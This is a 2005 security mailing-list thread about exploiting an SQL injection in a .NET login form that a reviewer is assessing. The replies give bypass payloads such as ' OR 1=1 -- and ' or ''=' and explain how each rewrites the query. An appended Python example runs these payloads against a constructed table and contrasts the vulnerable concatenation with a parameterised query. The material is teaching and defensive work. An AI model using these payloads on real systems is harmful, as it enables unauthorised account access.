WebApp Sec mailing list archives

RE: Simple to exploit SQL Injection ?


From: "Haaland, Vegar Linge" <Vegar.Linge.Haaland () palantir no>
Date: Mon, 28 Nov 2005 13:42:16 +0100

And you could try using:
' or ''='
As username and password. That will make the query look like:
SELECT * FROM users WHERE username = '' or ''='' AND password = '' or ''=''
(Or anything that always is true;
Some examples:
You could use: hi' or 'a'='a
This will give you username = 'hi' or 'a'='a'
This will "always" be true (if I read the query right :P), cause 'a' equals 'a'
And so on.

-----Original Message-----
From: Yousef Syed [mailto:yousef.syed () gmail com] 
Sent: 28. november 2005 13:20
To: Jason binger
Cc: webappsec () securityfocus com
Subject: Re: Simple to exploit SQL Injection ?

Hi Jason,
Try the following Password:
' OR 1=1 --

That should give the following SQL:
'SELECT *
FROM users
WHERE username = 'xyz'
AND password = '' OR 1=1 -- '

Since 1 always evaluates to 1, the rest of the SQL will be ignored and
you should get the result you were expecting. Using the "--" comment,
will stop anything else after this from being evaluated. That should
stop you getting any syntax errors.

ys

--
Yousef Syed
"One senior official said the consultancy "doesn't have the greatest of
reputations among civil servants. They come and state the bleeding
obvious using Powerpoint"."

On 28/11/05, Jason binger <cisspstudy () yahoo com> wrote:
I am reviewing a .Net web application. When entering xyz for a 
username and ' for a password into a form I receive the following 
stack trace (extract):

System.Exception: Can't Load DataReader using SQL
string: 'SELECT * FROM users WHERE username = 'xyz'
AND password = '''' -- Unclosed quotation mark before the character 
string '''. Line 1: Incorrect syntax near '''.

Now I would have thought this would be easy to exploit, but I can't 
bypass the logon page. xyz is a valid username. Any ideas?

Cheers




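The queries discussed in this thread, run against a constructed SQLite table (an added example, not code from the thread or from Jason's .NET application): the string-built query behaves exactly as the replies describe, while a parameterised query given the same inputs returns nothing, which is the fix a reviewer should recommend. The table contents and the `login_concat`/`login_param` names are assumptions made for the example.

```python
import sqlite3

# Vulnerable shape: the same string-built statement the stack trace in the thread shows.
VULN_SQL = "SELECT * FROM users WHERE username = '{}' AND password = '{}'"
# Fixed shape: placeholders, so the driver passes the values as data, never as SQL.
SAFE_SQL = "SELECT * FROM users WHERE username = ? AND password = ?"


def make_db():
    """Constructed in-memory users table; 'xyz' is the valid username from the thread."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('xyz', 'constructed-secret')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable login: input is pasted into the SQL text.

    Returns the matched rows, or None when the database rejects the statement
    (the lone-quote case that produced Jason's syntax error). A real application
    must not echo that database error to the client, as the stack trace did."""
    sql = VULN_SQL.format(username, password)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def login_param(conn, username, password):
    """Fixed login: the quote characters in the input never reach the SQL parser."""
    return conn.execute(SAFE_SQL, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("lone quote     :", login_concat(db, "xyz", "'"))                  # None: syntax error
    print("' OR 1=1 --    :", login_concat(db, "xyz", "' OR 1=1 --"))        # one row: bypass
    print("' or ''='      :", login_concat(db, "' or ''='", "' or ''='"))    # one row: bypass
    print("parameterised  :", login_param(db, "xyz", "' OR 1=1 --"))         # []: input stays data
```

Detection follows from the same shape: a login handler that raises database syntax errors on a single quote, or that returns rows for a comment marker in the password, is concatenating user input into SQL.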
